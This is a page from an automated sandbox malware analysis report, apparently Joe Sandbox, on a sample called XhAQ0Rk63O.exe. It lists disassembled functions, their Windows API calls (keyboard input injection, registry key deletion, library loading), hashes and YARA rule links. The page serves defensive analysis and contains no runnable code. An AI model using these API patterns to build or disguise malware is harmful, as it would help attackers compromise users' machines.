                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                          • String ID: .lnk$HH
                                                                                          • API String ID: 886957087-3121654589
                                                                                          • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                          • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                          • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                          • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                          Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 1173514356-4108050209
                                                                                          • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                          • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                          • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                          • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                          Function 00437CA6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 107libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                          • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: AU3_GetPluginDetails$Wu
                                                                                          • API String ID: 145871493-136108093
                                                                                          • Opcode ID: e60d032cda8e07fae4321829b238a90b33a1110472f30aca6681d3aeba7a8f27
                                                                                          • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                          • Opcode Fuzzy Hash: e60d032cda8e07fae4321829b238a90b33a1110472f30aca6681d3aeba7a8f27
                                                                                          • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                          Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 763830540-1403004172
                                                                                          • Opcode ID: 169cb05da2f7371639be8c7bcea77e944b24e4bfad061a6cd0ac94a92c737455
                                                                                          • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                          • Opcode Fuzzy Hash: 169cb05da2f7371639be8c7bcea77e944b24e4bfad061a6cd0ac94a92c737455
                                                                                          • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                          Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75572EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                            • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentHandleProcess$Duplicate
                                                                                          • String ID: nul
                                                                                          • API String ID: 2124370227-2873401336
                                                                                          • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                          • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                          • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                          • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                          Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75572EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                            • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentHandleProcess$Duplicate
                                                                                          • String ID: nul
                                                                                          • API String ID: 2124370227-2873401336
                                                                                          • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                          • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                          • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                          • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                          Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                          • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                          • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                          • String ID: SysAnimate32
                                                                                          • API String ID: 3529120543-1011021900
                                                                                          • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                          • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                          • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                          • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                          Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                          • TranslateMessage.USER32(?), ref: 0044308B
                                                                                          • DispatchMessageW.USER32(?), ref: 00443096
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1795658109-438819550
                                                                                          • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                          • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                          • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                          • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                          Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                            • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                            • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                            • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                            • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                          • GetFocus.USER32 ref: 004609EF
                                                                                            • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                            • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                          • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                          • __swprintf.LIBCMT ref: 00460A7A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                          • String ID: %s%d
                                                                                          • API String ID: 991886796-1110647743
                                                                                          • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                          • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                          • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                          • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                          Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memset$_sprintf
                                                                                          • String ID: %02X
                                                                                          • API String ID: 891462717-436463671
                                                                                          • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                          • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                          • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                          • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                          Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0042CD00
                                                                                          • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,004A8E80,C:\Users\user\Desktop\XhAQ0Rk63O.exe,0040F3D2), ref: 0040FFCA
                                                                                            • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                            • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                            • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                            • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                            • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                            • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                          • String ID: $OH$@OH$X
                                                                                          • API String ID: 3491138722-1394974532
                                                                                          • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                          • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                          • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                          • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                          Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                          • SendInput.USER32 ref: 0044C509
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardMessagePostState$InputSend
                                                                                          • String ID:
                                                                                          • API String ID: 3031425849-0
                                                                                          • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                          • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                          • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                          • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                          Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                          • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Enum$CloseDeleteOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2095303065-0
                                                                                          • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                          • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                          • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                          • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                          Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                          • String ID:
                                                                                          • API String ID: 2832842796-0
                                                                                          • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                          • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                          • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                          • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                          Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 00447997
                                                                                          • GetCursorPos.USER32(?), ref: 004479A2
                                                                                          • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                          • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1822080540-0
